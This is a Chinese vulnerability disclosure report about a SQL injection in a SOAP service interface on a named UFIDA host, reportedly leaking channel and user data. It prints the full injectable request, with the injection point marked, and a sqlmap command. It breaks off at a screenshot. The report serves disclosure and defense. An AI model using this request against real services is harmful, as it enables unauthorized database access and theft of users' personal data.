服务接口存在sql注射漏洞,泄漏全国渠道和用户信息

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 服务接口存在sql注射漏洞,泄漏全国渠道和用户信息 ### 详细说明: 1、访问http://t.ufida.com.cn/,发现存在大量的开放接口,对其中的GetVerSionJSON进行测试,发现存在sql注射漏洞。 [<img src="https://images.seebug.org/upload/201505/232053486fc67f2386d8897d6dad116b3f433198.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/232053486fc67f2386d8897d6dad116b3f433198.jpg) 2、注入的请求内容如下: ``` POST /Service.asmx HTTP/1.1 Host: t.ufida.com.cn Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://tempuri.org/GetVerSionJSON" <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetVerSionJSON xmlns="http://tempuri.org/"> <Product>u8 *</Product> </GetVerSionJSON> </soap:Body> </soap:Envelope> ``` 执行 ``` sqlmap -r /root/p.txt ``` ,截图如下: [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息